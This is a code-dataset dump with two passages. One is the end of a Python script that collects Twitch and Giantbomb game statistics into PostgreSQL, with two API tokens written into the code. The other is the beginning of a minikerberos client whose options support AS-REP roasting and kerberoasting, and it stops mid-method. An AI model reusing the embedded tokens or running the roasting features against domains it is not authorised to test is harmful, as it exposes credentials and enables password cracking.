%(channels)s,\n rank_total = rank_total + %(rank)s,\n trials = trials + 1\n WHERE name = %(name)s;\n ELSE\n INSERT INTO game_name VALUES (\n DEFAULT,\n %(name)s,\n %(giantbombid)s,\n %(viewers)s,\n %(channels)s,\n %(rank)s,\n 1\n );\n END IF;\n END\n $do$\n '''\n cur.execute(query, row)\n conn.commit()\n conn.close()\n\n\nclass Twitch:\n \"\"\"twitch API\"\"\"\n\n def __init__(self):\n self.token = 'gl05eybq9tbzcqcqirx3ubfai4fxjk5'\n self.fields = self.set_fields\n\n @property\n def set_fields(self):\n \"\"\" api call to twitch to get data\n\n :return: (list) list of dicts of json\n \"\"\"\n\n fields = []\n headers = {'client-id': self.token}\n data = requests.get('https://api.twitch.tv/kraken/games/top', params=dict(limit=100), headers=headers).json()\n\n for index, field in enumerate(data['top']):\n row = dict(\n name=field['game']['name'],\n giantbombid=field['game']['giantbomb_id'],\n viewers=field['viewers'],\n channels=field['channels'],\n rank=index + 1\n )\n fields.append(row)\n return fields\n\n def index_name(self, name):\n \"\"\" get index matching name\n\n :param name: (str) name of game\n :return: (int) index of name in fields\n \"\"\"\n\n for index, row in enumerate(self.fields):\n if row['name'] == name:\n return index\n\n\nclass Giantbomb:\n \"\"\"giantbomb API\"\"\"\n\n def __init__(self):\n self.token = '94bbf300f268659d00d7ad890c3cadcee955a765' # api token\n self.tablenames = [('original_game_rating', 'rating'),\n ('platforms', 'platform'),\n ('franchises', 'franchise'),\n ('publishers', 'publisher'),\n ('genres', 'genre'),\n ('themes', 'theme')]\n\n # populating db_ids and mismatch_ids from db\n self.db_ids = self.set_db_ids()\n self.mismatch_ids = self.set_mismatch_ids()\n\n def search_web(self, name, giantbombid):\n \"\"\" accesses giantbomb api for search query and returns api if giantbombid matches\n\n :param name: (str) name of game\n :param giantbombid: (int) id number of game\n :return: (str): url for api link\n \"\"\"\n\n if giantbombid == 0:\n print('no giantbombid')\n return\n else:\n url = 'http://giantbomb.com/api/search/'\n\n headers = {'user-agent': 'DataIncubatorProjectBot'}\n param = dict(\n format='json',\n resources='game',\n api_key=self.token,\n query=name\n )\n\n data = requests.get(url, params=param, headers=headers).json()\n\n for row in data['results']:\n if giantbombid == row['id']:\n return row['api_detail_url']\n print('no match found')\n return\n\n def search_mismatch(self, name):\n \"\"\" checks mismatch table for name and returns giantbombid for that name\n\n :param name: (str) name of game\n :return: (int) giantbombid\n \"\"\"\n\n data = [item[0] for item in self.mismatch_ids if item[1] == name]\n if data:\n return data[0]\n else:\n print('no match found, adding mismatch')\n fetch = self.add_mismatch(name)\n return fetch\n\n def search_name(self, name):\n \"\"\" accesses api and returns first match or returns None if none found\n\n :param name: (str) name of game\n :return: (str) api url\n \"\"\"\n\n url = 'http://giantbomb.com/api/search/'\n headers = {'user-agent': 'DataIncubatorProjectBot'}\n\n param = dict(\n format='json',\n resources='game',\n api_key=self.token,\n query=name\n )\n fields = requests.get(url, params=param, headers=headers).json()\n\n if fields['results']:\n for row in fields['results']:\n if re.search(name, row['name']):\n return row['id']\n return None\n\n def add_mismatch(self, name):\n \"\"\"adding mismatch to table\n\n :param name: (int) name of game\n :return: giantbombid (int)\n \"\"\"\n\n giantbombid = self.search_name(name)\n\n conn = connect()\n cur = conn.cursor()\n\n if not giantbombid:\n print('no match found')\n\n query = '''SELECT giantbombid FROM giantbomb ORDER BY giantbombid DESC'''\n cur.execute(query)\n fetch = cur.fetchone()\n\n if fetch[0] < 1000000:\n giantbombid = 1000000 # setting id to high value to avoid mismatch\n else:\n giantbombid = fetch[0] + 1 # setting from highest value\n\n query = '''INSERT INTO mismatch VALUES (\n DEFAULT,\n %(name)s,\n %(giantbombid)s\n )\n '''\n cur.execute(query, dict(name=name, giantbombid=giantbombid))\n conn.commit()\n conn.close()\n\n return giantbombid\n\n @staticmethod\n def set_db_ids():\n \"\"\" populates db_ids with giantbombids for searching\n\n :return: (tuple) db ids in tuple\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n query = '''SELECT giantbombid FROM giantbomb'''\n cur.execute(query)\n fetch = cur.fetchall()\n conn.close()\n\n return fetch\n\n @staticmethod\n def set_mismatch_ids():\n \"\"\" populates mismatch_ids for searching\n\n :return: (tuple) mismatch ids\n \"\"\"\n\n conn = connect()\n cur = conn.cursor()\n query = '''SELECT giantbombid, name FROM mismatch'''\n cur.execute(query)\n fetch = cur.fetchall()\n conn.close()\n\n return fetch\n\n def check_db(self, name, giantbombid):\n \"\"\" checks db_ids for giantbombid\n if giantbombid doesn't exist search mismatch table for giantbombid\n\n :param name: (str) name of game\n :param giantbombid: (int) id of game\n :return: None\n \"\"\"\n\n if giantbombid == 0:\n giantbombid = self.search_mismatch(name)\n\n data = [item[0] for item in self.db_ids if giantbombid in item]\n\n if not data:\n api = self.search_web(name, giantbombid)\n\n if api:\n self.add_db(api, name)\n else:\n self.add_db_no_api(name, giantbombid)\n print('added ' + name + ' to giantbomb table')\n\n @staticmethod\n def add_db_no_api(name, giantbombid):\n \"\"\"db call for no api\n\n :param name: (str) name of game\n :param giantbombid: (int) id of game\n :return: None\n \"\"\"\n conn = connect()\n cur = conn.cursor()\n\n query = '''INSERT INTO giantbomb VALUES (%(giantbombid)s, %(name)s) '''\n cur.execute(query, dict(giantbombid=giantbombid, name=name))\n\n conn.commit()\n conn.close()\n\n def add_db(self, api, name):\n \"\"\" db add with api call\n\n :param api: (str) api url\n :param name: (str) name of game\n :return: None\n \"\"\"\n\n headers = {'user-agent': 'DataIncubatorProjectBot'}\n fields = requests.get(api, params=dict(format='json', api_key=self.token), headers=headers).json()\n row = fields['results']\n\n data = dict(\n name=name,\n giantbombid=row['id'],\n alias=row['aliases'],\n api=row['api_detail_url'],\n release=row['original_release_date'],\n deck=row['deck']\n )\n\n conn = connect()\n cur = conn.cursor()\n\n # looping through tablenames to populate tables\n for tablename in self.tablenames:\n self.add_resource(data['giantbombid'], tablename, row, cur)\n\n # final query to giantbomb table\n query = '''\n INSERT INTO giantbomb VALUES (\n %(giantbombid)s,\n %(name)s,\n %(alias)s,\n %(api)s,\n %(release)s,\n %(deck)s\n )\n '''\n\n cur.execute(query, data)\n conn.commit()\n conn.close()\n\n @staticmethod\n def add_resource(giantbombid, table_name, row, cur):\n \"\"\"adds info to each table\n\n :param giantbombid: (int) id of game\n :param table_name: (str) name of table\n :param row: (json) json of api call\n :param cur: (object) cursor for sql connection\n :return: None\n :rtype: object\n \"\"\"\n\n # check if resource exists\n if row.get(table_name[0]) is None:\n return\n\n elif row[table_name[0]] is None:\n return\n\n else:\n data = dict(giantbombid=AsIs(giantbombid),\n tablename=AsIs(table_name[1]),\n tablebombname=AsIs(table_name[1] + 'bomb')\n )\n\n for item in row[table_name[0]]:\n data['name'] = item['name']\n data['id'] = item['id']\n\n # adding to resourcebomb table\n query = '''\n INSERT INTO %(tablebombname)s VALUES(DEFAULT, %(id)s, %(giantbombid)s)\n '''\n cur.execute(query, data)\n\n # adding to resource table, checking for uniqueness\n query = '''\n DO\n $do$\n BEGIN\n IF NOT EXISTS(SELECT * FROM %(tablename)s WHERE %(tablename)s = %(name)s) THEN\n INSERT INTO %(tablename)s VALUES(%(id)s, %(name)s);\n END IF;\n END\n $do$\n '''\n cur.execute(query, data)\n\n return\n","sub_path":"db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":12295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562559756","text":"import collections\nimport datetime\nimport secrets\nfrom typing import List, Dict\nfrom unicrypto import hashlib\n\nfrom minikerberos import logger\nfrom minikerberos.common.ccache import CCACHE\nfrom minikerberos.network.clientsocket import KerberosClientSocket\nfrom minikerberos.protocol.asn1_structs import METHOD_DATA, ETYPE_INFO, ETYPE_INFO2, \\\n\tPADATA_TYPE, PA_PAC_REQUEST, PA_ENC_TS_ENC, EncryptedData, krb5_pvno, KDC_REQ_BODY, \\\n\tAS_REQ, TGS_REP, KDCOptions, PrincipalName, EncASRepPart, EncTGSRepPart, PrincipalName, Realm, \\\n\tChecksum, APOptions, Authenticator, Ticket, AP_REQ, TGS_REQ, CKSUMTYPE, \\\n\tPA_FOR_USER_ENC, PA_PAC_OPTIONS, PA_PAC_OPTIONSTypes, EncTicketPart\n\nfrom minikerberos.protocol.errors import KerberosErrorCode, KerberosError\nfrom minikerberos.protocol.encryption import Key, _enctype_table, _HMACMD5, Enctype\nfrom minikerberos.protocol.constants import PaDataType, EncryptionType, NAME_TYPE, MESSAGE_TYPE\nfrom minikerberos.protocol.structures import AuthenticatorChecksum\nfrom minikerberos.protocol.rfc4556 import PKAuthenticator, AuthPack, PA_PK_AS_REP, KDCDHKeyInfo, PA_PK_AS_REQ\nfrom minikerberos.common.creds import KerberosCredential\nfrom minikerberos.common.target import KerberosTarget\nfrom minikerberos.common.spn import KerberosSPN\nfrom minikerberos.protocol.ticketutils import construct_apreq_from_tgs_tgt\n\n\nfrom asn1crypto import cms\nfrom asn1crypto import core\n\nclass KerbrosClient:\n\tdef __init__(self, ccred:KerberosCredential, target:KerberosTarget):\n\t\tself.credential = ccred\n\t\tself.target = target\n\t\tself.ksoc = KerberosClientSocket(self.target)\n\t\tself.ccache = CCACHE() if ccred.ccache is None else ccred.ccache\n\t\tself.kerberos_session_key = None\n\t\tself.kerberos_TGT = None\n\t\tself.kerberos_TGT_encpart = None\n\t\tself.kerberos_TGS = None\n\t\tself.kerberos_cipher = None\n\t\tself.kerberos_cipher_type = None\n\t\tself.kerberos_key = None\n\t\tself.server_salt = None\n\t\tself.pkinit_tkey = None\n\n\tdef build_asreq_lts(self, supported_encryption_method, kdcopts:List[str] = ['forwardable','renewable','proxiable'], enctimestamp=None, newnow=None, no_preauth = False, kdc_req_body_extra = None, with_pac:bool = True) -> AS_REQ:\n\t\tlogger.debug('Constructing TGT request with auth data')\n\t\t#now to create an AS_REQ with encrypted timestamp for authentication\n\t\tpadatas = []\n\t\t\n\t\tif with_pac is True:\n\t\t\tpa_data_1 = {}\n\t\t\tpa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))\n\t\t\tpa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()\n\t\t\tpadatas.append(pa_data_1)\n\t\t\n\t\tlogger.debug('Selecting common encryption type: %s' % supported_encryption_method.name)\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tif no_preauth is False:\n\t\t\tif enctimestamp is None:\n\t\t\t\t#creating timestamp asn1\n\t\t\t\ttimestamp = PA_ENC_TS_ENC({'patimestamp': now.replace(microsecond=0), 'pausec': now.microsecond}).dump()\n\t\t\t\tself.kerberos_cipher = _enctype_table[supported_encryption_method.value]\n\t\t\t\tself.kerberos_cipher_type = supported_encryption_method.value\n\t\t\t\tself.kerberos_key = Key(self.kerberos_cipher.enctype, self.credential.get_key_for_enctype(supported_encryption_method, salt = self.server_salt))\n\t\t\t\tenc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)\n\t\t\telse:\n\t\t\t\tnow = newnow\n\t\t\t\tenc_timestamp = enctimestamp\n\t\t\t\n\t\t\tpa_data_2 = {}\n\t\t\tpa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))\n\t\t\tpa_data_2['padata-value'] = EncryptedData({'etype': supported_encryption_method.value, 'cipher': enc_timestamp}).dump()\n\t\t\tpadatas.append(pa_data_2)\n\n\t\tkdc_req_body = {}\n\t\tkdc_req_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkdc_req_body['realm'] = self.credential.domain.upper()\n\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})\n\t\tkdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['nonce'] = secrets.randbits(31)\n\t\tkdc_req_body['etype'] = [supported_encryption_method.value] #selecting according to server's preferences\n\t\t\n\t\tif kdc_req_body_extra is not None:\n\t\t\tfor key in kdc_req_body_extra:\n\t\t\t\tkdc_req_body[key] = kdc_req_body_extra[key]\n\t\t\n\t\tkdc_req = {}\n\t\tkdc_req['pvno'] = krb5_pvno\n\t\tkdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value\n\t\tkdc_req['padata'] = padatas\n\t\tkdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)\n\t\t\n\t\treturn AS_REQ(kdc_req)\n\t\n\tdef build_asreq_pkinit(self, supported_encryption_method, kdcopts = ['forwardable','renewable','renewable-ok'], with_pac:bool = True) -> AS_REQ:\n\t\tfrom asn1crypto import keys\n\n\t\tif supported_encryption_method.value == 23:\n\t\t\traise Exception('RC4 encryption is not supported for certificate auth!')\n\n\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\n\t\tkdc_req_body_data = {}\n\t\tkdc_req_body_data['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkdc_req_body_data['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkdc_req_body_data['realm'] = self.credential.domain.upper()\n\t\tkdc_req_body_data['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})\n\t\tkdc_req_body_data['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body_data['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body_data['nonce'] = secrets.randbits(31)\n\t\tkdc_req_body_data['etype'] = [supported_encryption_method.value] #[18,17] # 23 breaks...\n\t\tkdc_req_body = KDC_REQ_BODY(kdc_req_body_data)\n\n\n\t\tchecksum = hashlib.sha1(kdc_req_body.dump()).digest()\n\n\t\tauthenticator = {}\n\t\tauthenticator['cusec'] = now.microsecond\n\t\tauthenticator['ctime'] = now.replace(microsecond=0)\n\t\tauthenticator['nonce'] = secrets.randbits(31)\n\t\tauthenticator['paChecksum'] = checksum\n\n\n\t\tdp = {}\n\t\tdp['p'] = self.credential.dhparams.p\n\t\tdp['g'] = self.credential.dhparams.g\n\t\tdp['q'] = 0 # mandatory parameter, but it is not needed\n\n\t\tpka = {}\n\t\tpka['algorithm'] = '1.2.840.10046.2.1'\n\t\tpka['parameters'] = keys.DomainParameters(dp)\n\n\t\tspki = {}\n\t\tspki['algorithm'] = keys.PublicKeyAlgorithm(pka)\n\t\tspki['public_key'] = self.credential.dhparams.get_public_key()\n\n\n\t\tauthpack = {}\n\t\tauthpack['pkAuthenticator'] = PKAuthenticator(authenticator)\n\t\tauthpack['clientPublicValue'] = keys.PublicKeyInfo(spki)\n\t\tauthpack['clientDHNonce'] = self.credential.dhparams.dh_nonce\n\n\t\tauthpack = AuthPack(authpack)\n\t\tsigned_authpack = self.credential.sign_authpack(authpack.dump(), wrap_signed = True)\n\n\t\tpayload = PA_PK_AS_REQ()\n\t\tpayload['signedAuthPack'] = signed_authpack\n\n\t\tpadatas = []\n\t\tif with_pac is True:\n\t\t\tpa_data_0 = {}\n\t\t\tpa_data_0['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))\n\t\t\tpa_data_0['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()\n\t\t\tpadatas.append(pa_data_0)\n\t\t\n\t\tpa_data_1 = {}\n\t\tpa_data_1['padata-type'] = PaDataType.PK_AS_REQ.value\n\t\tpa_data_1['padata-value'] = payload.dump()\n\t\tpadatas.append(pa_data_1)\n\n\t\tasreq = {}\n\t\tasreq['pvno'] = 5\n\t\tasreq['msg-type'] = 10\n\t\tasreq['padata'] = padatas\n\t\tasreq['req-body'] = kdc_req_body\n\n\t\treturn AS_REQ(asreq)\n\n\tdef do_preauth(self, supported_encryption_method, kdcopts = ['forwardable','renewable','renewable-ok'], with_pac:bool = True):\n\t\tif self.credential.certificate is not None:\n\t\t\treq = self.build_asreq_pkinit(supported_encryption_method, kdcopts, with_pac=with_pac)\n\t\telse:\n\t\t\treq = self.build_asreq_lts(supported_encryption_method, kdcopts, with_pac=with_pac)\n\n\t\t\n\t\tlogger.debug('Sending TGT request to server')\n\t\trep = self.ksoc.sendrecv(req.dump())\n\t\tif rep.name == 'KRB_ERROR':\n\t\t\traise KerberosError(rep, 'Preauth failed!')\n\t\treturn rep\n\n\tdef tgt_from_ccache(self):\n\t\ttry:\n\t\t\tif self.ccache is None:\n\t\t\t\traise Exception('No CCACHE file found')\n\t\t\t\n\t\t\ttgt, keystruct, err = self.ccache.get_tgt(self.credential.username, self.credential.domain, self.credential.ccache_spn_strict_check)\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\tself.kerberos_TGT = tgt\n\t\t\tself.kerberos_TGT_encpart = tgt['enc-part']\n\t\t\tself.kerberos_session_key = Key(keystruct['keytype'], keystruct['keyvalue'])\n\t\t\tself.kerberos_cipher = _enctype_table[keystruct['keytype']]\n\t\t\tself.kerberos_cipher_type = keystruct['keytype']\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn None, e\n\t\n\tdef select_preferred_encryption_method(self, rep):\n\t\t#now getting server's supported encryption methods\n\t\t\n\t\tsupp_enc_methods = collections.OrderedDict()\n\t\tfor enc_method in METHOD_DATA.load(rep['e-data']).native:\n\t\t\tdata_type = PaDataType(enc_method['padata-type'])\n\t\t\t\n\t\t\tif data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:\n\t\t\t\tif data_type == PaDataType.ETYPE_INFO:\n\t\t\t\t\tenc_info_list = ETYPE_INFO.load(enc_method['padata-value'])\n\t\t\t\t\t\n\t\t\t\telif data_type == PaDataType.ETYPE_INFO2:\n\t\t\t\t\tenc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])\n\t\t\n\t\t\t\tfor enc_info in enc_info_list.native:\n\t\t\t\t\tsupp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']\n\t\t\t\t\tlogger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))\n\t\t\n\t\tpreferred_enc_type = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\tif preferred_enc_type not in supp_enc_methods:\n\t\t\traise Exception('Preferred enc type not in supported enctypes')\n\t\tsalt = supp_enc_methods[preferred_enc_type]\n\t\tif salt is not None:\n\t\t\tsalt = salt.encode()\n\t\tself.server_salt = salt #enc_info['salt'].encode()\n\t\treturn preferred_enc_type\n\n\tdef get_TGT(self, override_etype = None, decrypt_tgt = True, kdcopts = ['forwardable','renewable','proxiable'], override_sname:KerberosSPN = None, with_pac:bool = True):\n\t\t\"\"\"\n\t\tdecrypt_tgt: used for asreproast attacks\n\t\tSteps performed:\n\t\t\t1. Send and empty (no encrypted timestamp) AS_REQ with all the encryption types we support\n\t\t\t2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)\n\t\t\t3. PROFIT\n\t\t\"\"\"\n\n\t\t#first, let's check if CCACHE has the correct ticket already\n\t\t_, err = self.tgt_from_ccache()\n\t\tif err is None:\n\t\t\treturn\n\t\t\n\t\tlogger.debug('Generating initial TGT without authentication data')\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tkdc_req_body = {}\n\t\tkdc_req_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkdc_req_body['realm'] = self.credential.domain.upper()\n\t\tif override_sname is None:\n\t\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})\n\t\telse:\n\t\t\t# if we want to directly kerberoast with no-preauth user\n\t\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': override_sname.get_principalname()})\n\t\tkdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['nonce'] = secrets.randbits(31)\n\t\tif override_etype is None:\n\t\t\tkdc_req_body['etype'] = self.credential.get_supported_enctypes()\n\t\telse:\n\t\t\tkdc_req_body['etype'] = override_etype\n\n\t\tpa_data_1 = {}\n\t\tif with_pac is True:\n\t\t\tpa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))\n\t\t\tpa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()\n\t\t\n\t\tkdc_req = {}\n\t\tkdc_req['pvno'] = krb5_pvno\n\t\tkdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value\n\t\tif len(pa_data_1) > 0:\n\t\t\tkdc_req['padata'] = [pa_data_1]\n\t\tkdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)\n\t\t\n\t\treq = AS_REQ(kdc_req)\t\n\t\t\n\t\tlogger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())\n\t\trep = self.ksoc.sendrecv(req.dump(), throw = False)\n\n\t\tif rep.name != 'KRB_ERROR':\n\t\t\t#user can do kerberos auth without preauthentication!\n\t\t\trep = rep.native\n\t\t\tself.kerberos_TGT = rep\n\n\t\t\t#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt\n\t\t\t#so we just return, the asrep can be extracted from this object anyhow\n\t\t\tif decrypt_tgt == False or self.credential.nopreauth is True:\n\t\t\t\treturn rep\n\n\t\t\tself.kerberos_cipher = _enctype_table[rep['enc-part']['etype']]\n\t\t\tself.kerberos_cipher_type = rep['enc-part']['etype']\n\t\t\tself.kerberos_key = Key(self.kerberos_cipher.enctype, self.credential.get_key_for_enctype(EncryptionType(rep['enc-part']['etype'])))\n\t\t\t\n\t\telse:\n\t\t\tif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:\n\t\t\t\traise KerberosError(rep)\n\t\t\trep = rep.native\n\t\t\tlogger.debug('Got reply from server, asikg to provide auth data')\n\t\t\tsupported_encryption_method = self.select_preferred_encryption_method(rep)\n\n\t\t\trep = self.do_preauth(supported_encryption_method)\n\t\t\tlogger.debug('Got valid TGT response from server')\n\t\t\trep = rep.native\n\t\t\tself.kerberos_TGT = rep\n\n\t\tif self.credential.certificate is not None:\n\t\t\tself.kerberos_TGT_encpart, self.kerberos_session_key, self.kerberos_cipher = self.decrypt_asrep_cert(rep)\n\t\t\tself.kerberos_cipher_type = supported_encryption_method.value\n\n\t\t\tself.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)\n\t\t\tlogger.debug('Got valid TGT')\n\t\t\treturn \n\t\t\n\t\telse:\n\t\t\tcipherText = rep['enc-part']['cipher']\n\t\t\ttemp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)\n\t\t\ttry:\n\t\t\t\tself.kerberos_TGT_encpart = EncASRepPart.load(temp).native\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('EncAsRepPart load failed, is this linux?')\n\t\t\t\ttry:\n\t\t\t\t\tself.kerberos_TGT_encpart = EncTGSRepPart.load(temp).native\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tlogger.error('Failed to load decrypted part of the reply!')\n\t\t\t\t\traise e\n\t\t\t\n\t\t\tself.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])\n\t\t\tself.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)\n\t\t\tlogger.debug('Got valid TGT')\n\t\t\t\n\t\t\treturn \n\t\n\tdef tgs_from_ccache(self, spn_user:KerberosSPN):\n\t\ttry:\n\t\t\tif self.ccache is None:\n\t\t\t\traise Exception('No CCACHE file found')\n\t\t\t\n\t\t\ttgs, keystruct, err = self.ccache.get_tgs(spn_user)\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\t\n\t\t\tkey = Key(keystruct['keytype'], keystruct['keyvalue'])\n\t\t\ttgs = TGS_REP(tgs).native\n\t\t\treturn tgs, tgs['enc-part'], key, None\n\t\texcept Exception as e:\n\t\t\treturn None, None, None, e\n\t\t\n\tdef get_TGS(self, spn_user, override_etype = None, is_linux = False):\n\t\t\"\"\"\n\t\tRequests a TGS ticket for the specified user.\n\t\tRetruns the TGS ticket, end the decrpyted encTGSRepPart.\n\n\t\tspn_user: KerberosTarget: the service user you want to get TGS for.\n\t\toverride_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket \n\t\t\"\"\"\n\t\t\n\t\t#first, let's check if CCACHE has the correct ticket already\n\t\ttgs, encTGSRepPart, key, err = self.tgs_from_ccache(spn_user)\n\t\tif err is None:\n\t\t\treturn tgs, encTGSRepPart, key\n\n\t\t\n\t\tif self.kerberos_TGT is None:\n\t\t\t#let's check if CCACHE has a TGT for us\n\t\t\t_, err = self.tgt_from_ccache()\n\t\t\tif err is not None:\n\t\t\t\traise Exception('No TGT found in CCACHE!')\n\n\t\t#nope, we need to contact the server\n\t\tlogger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tkdc_req_body = {}\n\t\tkdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))\n\t\tkdc_req_body['realm'] = spn_user.domain.upper()\n\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})\n\t\tkdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['nonce'] = secrets.randbits(31)\n\t\tif override_etype:\n\t\t\tkdc_req_body['etype'] = override_etype\n\t\telse:\n\t\t\tif self.kerberos_cipher_type == -128:\n\t\t\t\t# we dunno how to do GSS api calls with -128 etype,\n\t\t\t\t# but we can request etype 23 here for which all is implemented\n\t\t\t\tkdc_req_body['etype'] = [23]\n\t\t\telse:\n\t\t\t\tkdc_req_body['etype'] = [self.kerberos_cipher_type]\n\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\t\t\n\t\tif is_linux:\n\t\t\tac = AuthenticatorChecksum()\n\t\t\tac.flags = 0\n\t\t\tac.channel_binding = b'\\x00'*16\n\t\t\t\n\t\t\tchksum = {}\n\t\t\tchksum['cksumtype'] = 0x8003\n\t\t\tchksum['checksum'] = ac.to_bytes()\n\n\n\t\t\tauthenticator_data['cksum'] = Checksum(chksum)\n\t\t\tauthenticator_data['seq-number'] = 0\n\t\t\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\t\t\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\t\t\n\t\tpa_data_1 = {}\n\t\tpa_data_1['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_data_1['padata-value'] = AP_REQ(ap_req).dump()\n\t\t\n\t\t\n\t\tkdc_req = {}\n\t\tkdc_req['pvno'] = krb5_pvno\n\t\tkdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkdc_req['padata'] = [pa_data_1]\n\t\tkdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)\n\t\t\n\t\treq = TGS_REQ(kdc_req)\n\t\tlogger.debug('Constructing TGS request to server')\n\t\trep = self.ksoc.sendrecv(req.dump())\n\t\tif rep.name == 'KRB_ERROR':\n\t\t\traise KerberosError(rep, 'get_TGS failed!')\n\t\tlogger.debug('Got TGS reply, decrypting...')\n\t\ttgs = rep.native\n\t\t\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\t\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('Got valid TGS reply')\n\t\tself.kerberos_TGS = tgs\n\t\treturn tgs, encTGSRepPart, key\n\n\tdef U2U(self, kdcopts = ['forwardable','renewable','canonicalize', 'enc-tkt-in-skey'], supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):\n\t\tif not self.kerberos_TGT:\n\t\t\tlogger.debug('[U2U] TGT is not available! Fetching TGT...')\n\t\t\tself.get_TGT()\n\n\t\tsupp_enc = 